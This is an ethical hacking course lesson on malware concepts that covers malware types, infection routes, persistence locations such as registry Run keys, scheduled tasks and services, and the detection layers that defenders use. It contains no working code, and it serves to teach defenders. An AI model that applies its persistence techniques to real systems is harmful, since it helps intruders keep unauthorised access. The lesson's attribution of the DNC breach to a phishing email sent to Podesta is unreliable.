Ethical Hacking Lesson 28 – Malware Concepts | Dataplexa

Ethical Hacking

I. Foundations & Hacking Mindset
1. What is Ethical Hacking 2. Hacker Types & Motivations 3. Legal & Ethical Considerations 4. Hacking Methodologies 5. Cyber Kill Chain 6. Footprinting & Reconnaissance 7. Passive vs Active Recon 8. Information Gathering Tools 9. Hacking Lab Setup 10. Kali Linux Overview
II. Reconnaissance & Scanning
11. DNS Enumeration 12. Whois & Network Enumeration 13. Google Dorking 14. Nmap Scanning 15. Port Scanning 16. Service Enumeration 17. Vulnerability Scanning 18. Nessus & OpenVAS 19. Banner Grabbing 20. Recon Best Practices
III. System & Network Attacks
21. Password Cracking 22. Brute Force Attacks 23. Credential Harvesting 24. Exploiting Misconfigurations 25. Linux System Attacks 26. Windows System Attacks 27. Privilege Escalation 28. Malware Concepts 29. Backdoors & Trojans 30. Network Sniffing 31. MITM Attacks 32. DoS Attacks 33. Wireless Attacks 34. Covering Tracks 35. Attack Mitigation
IV. Web Hacking & Real World
36. Web Architecture 37. OWASP Top 10 38. SQL Injection 39. Cross-Site Scripting (XSS) 40. Authentication Attacks 41. Session Hijacking 42. File Upload Vulnerabilities 43. API Security 44. Tools Summary 45. Mini Project – Ethical Hacking Lab
System & Network Attacks · Lesson 28

Malware Concepts

Understanding malware is not the same as writing it. This lesson covers how malware actually works — its categories, infection chains, persistence tricks, and how defenders detect each type. The knowledge runs both ways: understanding attacks is how you assess whether a client's defences would survive one.

Why pen testers need to understand malware deeply

Clients do not just want vulnerabilities found — they want to know whether their defences would catch a real attack. Answering that question requires understanding what those attacks actually do. A pen tester who knows how a RAT establishes persistence can check whether the client's EDR monitors the specific registry key it creates. One who understands ransomware encryption can evaluate whether the backup strategy would survive an actual infection.

The knowledge is defensive as much as offensive. Most organisations over-invest in perimeter security and under-invest in understanding what happens after the perimeter fails — which it will, eventually. That post-breach understanding is where malware knowledge pays the most.

Malware categories — what each type actually does

Virus — infects files, spreads on execution

Requires user action

A virus attaches itself to a legitimate file. When that file is opened or shared, the virus executes and attempts to infect other files on the system or network. Classic viruses required human action to spread — opening the infected document or running the infected program. Modern antivirus primarily targets known virus signatures through file hash comparison and byte-sequence matching. The limitation is obvious: change a single byte and the signature no longer matches.

Detection signal: Static hash match against known signature database. Bypassed by any modification to the payload.

Worm — self-propagates without user interaction

No click required

Worms spread automatically across networks by exploiting service vulnerabilities — no human action required. WannaCry in 2017 reached over 200,000 systems across 150 countries in 72 hours by exploiting MS17-010, the EternalBlue SMB vulnerability the NSA had been quietly using before Shadow Brokers leaked it publicly. The NHS was crippled. Factories stopped. The damage ran into billions. What made it so devastating was the combination of a reliable exploit and self-propagation — defenders had very little time between initial infection and widespread network compromise.

Detection signal: Mass outbound SMB connection attempts, anomalous lateral movement, rapid file encryption on network shares.

Remote Access Trojan — full remote control

Silent persistent access

A RAT establishes an encrypted channel to the attacker's command-and-control infrastructure. Through it, the attacker can execute arbitrary commands, capture keystrokes, screenshot the desktop, activate the webcam, and pivot to other systems — all over what looks like normal HTTPS traffic. The communication pattern that gives RATs away is beaconing: the implant checks in with its C2 server at regular intervals regardless of whether it has anything to report. A process making an HTTPS connection to an unknown domain every 60 seconds, consistently, is a detection signal that SIEM rules and network analysis tools are specifically tuned to catch.

Detection signal: Regular outbound connections at fixed intervals to unusual external hosts, encrypted traffic to non-standard ports.

Ransomware — encrypts then extorts

Double extortion now standard

Ransomware encrypts the victim's files using strong asymmetric cryptography and demands payment for the key. Modern ransomware groups are not opportunistic — they are deliberate. Attackers spend weeks inside a network, mapping infrastructure, escalating privileges, and exfiltrating data before triggering the encryption. The exfiltration is the piece that makes a solid backup strategy insufficient on its own. Even if the victim can restore from backup, the attackers hold the stolen data and will publish it if the ransom is not paid. This double extortion model became standard after 2019 and fundamentally changed the risk calculus around ransomware preparedness.

Detection signal: Mass file rename events, high disk write activity, shadow copy deletion, large outbound data transfers before encryption begins.

Rootkit — hides everything from the OS

Most difficult to detect

A rootkit modifies the operating system at a deep level — intercepting system calls to hide processes, files, registry keys, and network connections from any tool that runs on the compromised OS. Running ps, netstat, or a file browser on a rootkit-infected system returns results that do not reflect reality. The OS is lying because the rootkit positioned itself between the hardware and the reporting layer. This is why incident response on suspected rootkit infections requires booting from trusted external media — you cannot trust the compromised OS to accurately describe its own state.

Detection signal: Discrepancy between OS-reported state and external monitoring. Memory forensics required for accurate analysis.

How malware gets in — the infection chain

The technical sophistication of the payload rarely matters as much as the delivery mechanism. Most infections begin with a user clicking something they should not — or with a trusted software update quietly compromised before it reached them.

INFECTION MECHANISMS — how malware achieves initial access
Mechanism Real-world example Primary defence
Phishing email The 2016 DNC breach began with a single spear-phishing email to John Podesta. His aide believed it was a legitimate Google security alert. He clicked. Accounts for the majority of initial access in documented breaches. Email filtering, user training
Supply chain SolarWinds 2020 — attackers compromised the Orion build pipeline and delivered a backdoored update to 18,000 organisations, all of whom trusted it because it was digitally signed by the legitimate vendor. Bypassed every perimeter control. Software signing, vendor vetting
Public service exploit Pulse Secure VPN vulnerabilities in 2021 were exploited by multiple nation-state groups before most organisations patched. No user interaction required — just an unpatched internet-facing service. Patching, attack surface reduction
Drive-by download Visiting a compromised website triggers a browser exploit that automatically downloads and executes malware. No user action beyond loading the page. Requires an unpatched browser or plugin. Browser patching, script blocking
Removable media Stuxnet — the most sophisticated malware ever publicly documented — spread via USB to reach air-gapped Iranian nuclear centrifuge control systems. The USB was the only bridge across the air gap. USB policy enforcement

The SolarWinds attack is worth sitting with. It demonstrated that an organisation can do everything technically right — patch promptly, run EDR, monitor traffic — and still be comprehensively compromised through a trusted vendor relationship. The attack surface is not bounded by your own infrastructure. It extends to every piece of third-party software you install and trust. That is a deeply uncomfortable reality for anyone responsible for securing an enterprise, and it has permanently changed how vendor risk is assessed in security programmes.

Persistence — surviving reboots and security scans

Getting code running once is only the start. Malware needs to survive reboots and avoid being cleaned by security tools. The persistence mechanisms attackers use are exactly the locations pen testers enumerate during escalation — the knowledge works in both directions.

Registry autoruns

HKCU\...\CurrentVersion\Run

Most common Windows persistence location. Runs at every login. No elevated privileges required for the HKCU key — any standard user can write to it. Easily detected by Autoruns but frequently missed in manual review because administrators rarely audit these keys proactively.

Scheduled tasks and cron

schtasks /create — crontab -e

Scheduled tasks can be hidden from the Windows Task Scheduler GUI by flagging them as system tasks. On Linux, cron entries in non-obvious locations go unnoticed for months on systems without active monitoring. Both are highly reliable persistence mechanisms that survive most remediation attempts if the entry itself is not found.

Service installation

sc create — systemctl enable

Registers the malware as an OS service that starts at boot and can restart automatically on failure. Requires elevated privileges to install — making it a common post-escalation step. The OS itself maintains the persistence, and a cursory service audit will not catch a convincingly named malicious service.

DLL hijacking

Writable directory in DLL search path

A malicious DLL placed in a directory that a legitimate application searches before its normal location. Every time the application loads — including at startup — it loads the malicious DLL first. Highly stealthy: the process appears entirely legitimate to monitoring tools because it is legitimate. The DLL is the only malicious component.

Advanced persistent threat actors — the type behind SolarWinds and Stuxnet — often use multiple persistence mechanisms simultaneously. Remove one and three others remain. This is why incident response professionals talk about complete reimaging rather than malware removal. On a sophisticated infection, you cannot trust that any individual persistence mechanism found was the only one installed.

Detection layers — what defenders actually use

Signature-based detection — antivirus

Compares file hashes and byte sequences against known malware signatures. Fast and effective against commodity threats. Completely bypassed by modifying even a single byte of the payload — encryption, packing, and polymorphism all work. Attackers have been bypassing antivirus trivially for decades. It remains necessary because it automatically catches the vast majority of low-skill commodity threats without human review.

Blind spot: Novel malware, obfuscated payloads, living-off-the-land attacks using legitimate system binaries.

Behavioural analysis — EDR

Endpoint Detection and Response tools monitor what processes actually do — what files they read and write, what network connections they open, what registry keys they modify, what child processes they spawn. Catches malware that evades signatures by identifying malicious behaviour patterns regardless of the specific code. A process that reads every file in a directory and renames them all with a new extension — regardless of what the process itself is named — is exhibiting ransomware behaviour.

Blind spot: Alert fatigue from false positives. Sophisticated attackers mimic legitimate behaviour patterns to blend into normal activity.

Network traffic analysis

Monitors outbound connections for C2 beaconing patterns, encrypted connections to unusual destinations, DNS requests for algorithmically generated domain names, and large data transfers indicating exfiltration. Many RATs and ransomware variants have distinctive network signatures even when their payload is fully obfuscated on disk. A process consistently beaconing to the same external IP every 30 seconds will eventually surface in a well-tuned network monitoring tool.

Blind spot: Encrypted traffic over port 443 is indistinguishable from legitimate HTTPS without deep packet inspection — which itself carries privacy and performance costs.

SIEM — correlated log analysis

Centralised collection and correlation of logs from endpoints, firewalls, Active Directory, cloud services, and applications. Identifies attack patterns across the full environment that no single endpoint tool would see — lateral movement from one host to another, credential abuse across multiple systems, privilege escalation followed immediately by data access. The Mandiant M-Trends report consistently shows median attacker dwell times measured in weeks. SIEM is the primary tool for reducing that window by correlating signals that individually look innocuous but together reveal a campaign.

Blind spot: Only as good as what is actually being logged. Log gaps are the most common weakness in real SIEM deployments.

No single layer catches everything. The correct framing is not "we have four security tools therefore we are protected" — it is "we have four layers and sophisticated attackers will evade some of them. Our goal is reducing the time between infection and detection." Every day shaved off attacker dwell time limits the damage. Every log gap extended is an opportunity for an attacker to operate undetected.

MITRE ATT&CK — the common language for malware techniques

MITRE ATT&CK is a publicly maintained knowledge base of attacker techniques, organised by tactic and technique, built from documented real-world intrusions. It covers every persistence mechanism, evasion technique, lateral movement method, and exfiltration approach that has been observed in actual attacks. It is updated continuously as new techniques surface from incident response investigations and threat intelligence reporting.

For pen testers, ATT&CK serves as both a comprehensive testing checklist and a reporting language. A report that cites T1547.001 — Registry Run Keys persistence — is more useful to a security team than one that vaguely references "registry-based persistence." The specific technique ID maps directly to the detection rules the security team should have in place and makes remediation prioritisation much cleaner.

For defenders, ATT&CK maps to detection engineering. A SOC that has written detection rules covering each ATT&CK technique relevant to their threat model is in a fundamentally stronger position than one running commercial tools without understanding what each covers. The framework is free at attack.mitre.org and is one of the most valuable resources in the field regardless of whether you sit on the offensive or defensive side.

Teacher's Note: If malware analysis interests you as a specialisation, running samples in an isolated sandbox is the fastest way to build intuition. Any.run and Joe Sandbox both offer free tiers — submit a sample, watch it execute, read the behaviour report. You will learn more from thirty minutes of that than from hours of reading about malware in the abstract.

Quiz

Scenario:

A threat actor deploys a custom RAT whose hash does not match any antivirus signature. The code is obfuscated and uses a legitimate Windows binary for execution. Traditional antivirus does not flag it. The organisation's EDR alerts within minutes. Which detection method does EDR use that antivirus alone cannot?

Scenario:

A CISO argues their offline backup strategy makes ransomware non-critical — they would restore and refuse to pay. A pen tester pushes back. What aspect of modern ransomware makes backup strategy alone insufficient?

Scenario:

Attackers compromised SolarWinds' build pipeline and inserted malicious code into the Orion update before it was signed and distributed. 18,000 organisations installed it through their normal update process. What infection mechanism does this represent?

Up Next · Lesson 29

Backdoors & Trojans

How backdoors are planted and maintained during an engagement, how trojans deliver payloads, and how defenders detect and respond to both.

← Previous Course Index Next →